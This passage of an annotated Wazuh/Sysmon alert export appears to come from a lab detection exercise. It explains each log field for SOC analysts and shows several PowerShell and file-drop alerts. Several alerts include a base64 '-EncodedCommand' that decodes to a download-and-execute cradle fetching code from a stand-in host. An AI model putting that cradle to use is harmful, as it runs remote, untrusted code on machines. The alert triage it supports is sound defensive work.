No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_yre4dc4i.koa.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:39.228
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:05.916+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:05.916+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  37
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534225.1228555
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:41.9715607Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283043
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:40.440 ProcessGuid: {94294ddc-bcf8-680a-f10a-000000000e00} ProcessId: 9540 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcf4-680a-eb0a-000000000e00} ParentProcessId: 14892 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:40.440
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcf8-680a-f10a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9540
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcf4-680a-eb0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:05.930+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:05.930+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  41
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534225.1236622
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:42.2552313Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283045
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:42.217 ProcessGuid: {94294ddc-bcf8-680a-f10a-000000000e00} ProcessId: 9540 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_z1i14jqk.z5t.ps1 CreationUtcTime: 2025-04-24 22:36:42.217 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:42.217
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcf8-680a-f10a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9540
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_z1i14jqk.z5t.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:42.217
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from passed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from passed to 'not applicable'

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:37:06.008+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:06.008+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from passed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19012
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['2.3.10.1']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534226.1239387
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26042
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting determines whether an anonymous user can request security identifier (SID) attributes for another user, or use a SID to obtain its corresponding user name. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  If this policy setting is enabled, a user with local access could use the well-known Administrator's SID to learn the real name of the built-in Administrator account, even if it has been renamed. That person could then use the account name to initiate a password guessing attack.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\Security Options\Network access: Allow anonymous SID/Name translation
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  2.3.10.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['powershell "$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \\"LSAAnonymousNameLookup\\").ToString().Split(\\"=\\")[1].Trim()"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS or FAIL. Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'powershell "$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \"LSAAnonymousNameLookup\").ToString().Split(\"=\")[1].Trim()"'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  passed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:06.548+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:06.548+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  38
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534226.1243086
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:44.5117007Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283086
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:43.206 ProcessGuid: {94294ddc-bcfb-680a-f30a-000000000e00} ProcessId: 13808 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcf8-680a-f10a-000000000e00} ParentProcessId: 9540 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:43.206
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcfb-680a-f30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13808
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcf8-680a-f10a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9540
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

